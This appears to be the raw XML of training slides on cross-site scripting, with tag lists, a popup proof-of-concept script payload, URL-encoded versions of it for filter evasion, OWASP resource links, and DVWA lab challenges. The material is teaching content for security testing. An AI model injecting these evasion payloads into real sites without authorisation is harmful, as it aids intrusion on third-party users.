                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>XSS-Filter-Evasion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CheatSheet</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46576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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS – Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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33350" y="1700435"/>
            <a:ext cx="10966323" cy="4719415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Proof of Concept payload  - Popup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert(‘XSS found’)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4CFFBFF-ABB4-45F5-902D-1E6E07095742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609725" y="3038974"/>
            <a:ext cx="3495675" cy="2118591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39416109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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS – Reflective - Encoding</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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76200" y="1676399"/>
            <a:ext cx="11052048" cy="4638675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL Encoding – or called Percent encoding -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Plays an important role</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Characters to be encoded - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/\=&lt;&gt;?+&amp;”;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before - &lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>%3Cscript%3Ealert%281%29%3C%2Fscript%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Http://site.com/?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Http://site.com/?name= %3Cscript%3Ealert%281%29%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>May assist in defeating blacklist or whitelist and style filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38868897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23247-6B0E-4537-8121-7E6651FD4ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoding using Chrome</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87AC9C42-DCAA-4489-89F1-5307E551392D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cntrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + Shift + I  = opens developer tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Console </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B1406ED-73E5-458D-8A6F-6ECB282B64D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867556" y="2233737"/>
            <a:ext cx="8495238" cy="1990476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2519937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OWASP Projects – Flag ship</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359CEC6B-6129-4D29-B5D6-D71E85746B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180870" y="1547446"/>
            <a:ext cx="10866541" cy="5124304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Zed Attack Proxy Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Testing Guide </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Top 10 –Web App</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP Top 10 – Mobile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP – Juice Shop </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Free for Open Source Application Security Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checklists – Best Practices, Cheat Sheets, Secure Coding by language etc.. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D6C5DC-6F85-440A-9F3C-CC12C89B532D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10051923" y="3429000"/>
            <a:ext cx="1805011" cy="2020288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35518E39-2430-4308-AD12-B3BD8F098B79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10144905" y="1116722"/>
            <a:ext cx="1619048" cy="1561905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21807053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6D20-5ABB-45C8-98B5-AF4C7A8B514D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO - GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C5F3B8-48AB-4799-AFEC-B7C9DE3F0A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609119" y="1600200"/>
            <a:ext cx="4973761" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30271117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EF670-950C-457F-9671-948E84031768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO - POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31470FD2-405F-44FF-8CEB-29410D3D0A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681661" y="1600200"/>
            <a:ext cx="4828678" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34520885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82D7-CC74-41AF-B32A-5A8225836392}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO JSON XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2BDAC1-2406-413F-A941-74ADDF442D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487341" y="1600200"/>
            <a:ext cx="5217317" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38533677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22F9-F5C1-480B-9913-CBCDD2AC20BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge DVWA Reflected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E74AD27-4A73-4540-80A1-4FFCD4A8B889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785207" y="1600200"/>
            <a:ext cx="6621586" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3077520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FA381-317A-4E1C-A018-A03636C1D116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge DVWA Reflected - MED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDD89E5-A783-42D9-9F4A-26DBE906DAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499373" y="1642730"/>
            <a:ext cx="5515467" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD82963D-1AD1-4B9E-89C9-3E5C5C7A0484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6177162" y="1577181"/>
            <a:ext cx="5587256" cy="4657060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
